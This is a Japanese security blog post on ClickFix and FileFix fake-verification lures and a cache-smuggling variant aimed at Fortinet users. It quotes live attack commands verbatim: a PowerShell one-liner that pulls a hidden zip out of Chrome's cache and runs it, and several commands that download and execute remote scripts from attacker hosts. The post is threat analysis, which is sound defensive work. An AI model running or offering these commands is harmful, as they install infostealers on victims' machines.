FileFix/ClickFixと言えば、人間かbotかどうかをチェックする画面でコマンドをコピペさせて"「Windows+R」にコマンドを貼り付けたら人間かどうかチェックできるよ！"というやつ。

始めはWindowsで流行っていたが、今はWindows/macOS/Linux問わず事例が確認されている。

基本的に、偽広告、偽アラート、乗っ取ったWebサイトでのClickFix配信が多いが、メール(リンク、添付ファイル内PDF・HTML)、SMS、Wifiアクセスポイントという事例もあるよう。

基本的にブラウザサンドボックスの中でのコピペなのでアンチウイルスは検知できない。実行後に検知できる可能性はあるが、製品やタイミングによってはすり抜けられるかも。

そんなClickFixは、FileFixと呼ばれる派生形があったり、7段階のフィッシングチェーンだったりとまだまだ進化中。

ClickFix進化系の中で気になったものが、コピペしたコマンドでマルウェアのダウンロードをしないでマルウェアを実行される手法

キャッシュ密輸/キャッシュスマッグリング/cache smuggling

ソースより、とあるFileFix系のコピペで実行を指示されたコマンドがコレ

C:\Windows\System32\conhost.exe –headless powershell -c “$k=’%LOCALAPPDATA%\FortiClient\compliance’;mkdir -Force $k > $null;$d=’%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\Cache_Data\’;cp $d* $k; gci $k|%{$c=[System.Text.Encoding]::Default.GetString([System.IO.File]::ReadAllBytes($_.FullName));$m=[regex]::Matches($c,'(?<=bTgQcBpv)(.*?)(?=mX6o0lBw)’,16);if($m.Count-gt 0){[System.IO.File]::WriteAllBytes($k+ ‘\ComplianceChecker.zip’,[System.Text.Encoding]::Default.GetBytes($m[0].Value)); Expand-Archive $k’\ComplianceChecker.zip’ $k -Force; & $k’\FortiClientComplianceChecker.exe’}} # \\Public\Support\VPN\ForticlientCompliance.exe ”

Fortinet系製品やサービスの利用者を狙ったものであることが分かる。注目すべきはpowershellで実行しているファイルを%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\Cache_Data\から読み込んでいる。つまり、指示されたコマンドでファイルのダウンロードを行っていない。

%LOCALAPPDATA%\Google\Chrome\User Data\Default\Cache\Cache_Data\にはブラウザのキャッシュが保存される場所。ということは、攻撃者が用意したWebページで「image/jpeg」などとして読み込まれた画像キャッシュとみられるものが、実際はマルウェアの一部だったということ。

cache smugglingを使用したマルウェアの展開は以前(1,2)からあるが、ClickFix系もここまで来たかという感じ。

ちなみにClickFix系の指示されるコマンドは例えばこんな感じ

powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "iex(New-Object Net.WebClient).DownloadString('hxxps://diab.live/up/loader.ps1')"

cmd /c start /min powershell -Command "curl.exe -s 'https[:]//cf-unstable[.]media/captcha.txt' -o (Join-Path $env:TEMP 'captcha.vbs'); Start-Process (Join-Path $env:TEMP 'captcha.vbs')"

curl - k - o "%TEMP%\\nvidiaRelease[.]zip" https[:]//driverservices[.]store/visiodrive/nvidiaRelease[.]zip && powershell - Command "Expand-Archive - Force - Path '%TEMP%\\nvidiaRelease[.]zip' - DestinationPath '%TEMP%\\nvidiaRelease'" && cscript "%TEMP%\\nvidiaRelease\\run[.]vbs"

余談

ClickFix系で展開されるマルウェアはインフォスティーラーが多い。それらで取得されたスティーラーログを見ると、コンピュータに全く詳しくない人というよりかは

• 無料って宣伝された怪しいプログラムをよくインストールする人
• チーター
• 仮想通貨のカジノよくやる人

が多いイメージ。

あと、今はLummaとRhadamanthys系が多いかなぁ。

参考

・eSentire | Unpacking NetSupport RAT Loaders Delivered via ClickFix
https://www.esentire.com/blog/unpacking-netsupport-rat-loaders-delivered-via-clickfix

・ClickFix Techniques - ClickGrab
https://mhaggis.github.io/ClickGrab/techniques.html

・故障修复之下的陷阱：Lazarus（APT-Q-1）近期利用 ClickFix 手法的攻击分析 | CN-SEC 中文网
https://cn-sec.com/archives/4411045.html

・Fix the Click: Preventing the ClickFix Attack Vector
https://unit42.paloaltonetworks.com/preventing-clickfix-attack-vector/

・ClickFix Chaos: A Deep Dive into Rhadamanthys Infostealer’s Stealth and Steal Tactics | Blog | Dark Atlas | Dark Web Monitoring Platform | Compromised Credentials Monitoring | Account Takeover Prevention Platform | Threat Intelligence | Buguard
https://darkatlas.io/blog/clickfix-chaos-a-deep-dive-into-rhadamanthys-infostealers-stealth-and-steal-tactics

・mrd0x.com/filefix-clickfix-alternative/
https://mrd0x.com/filefix-clickfix-alternative/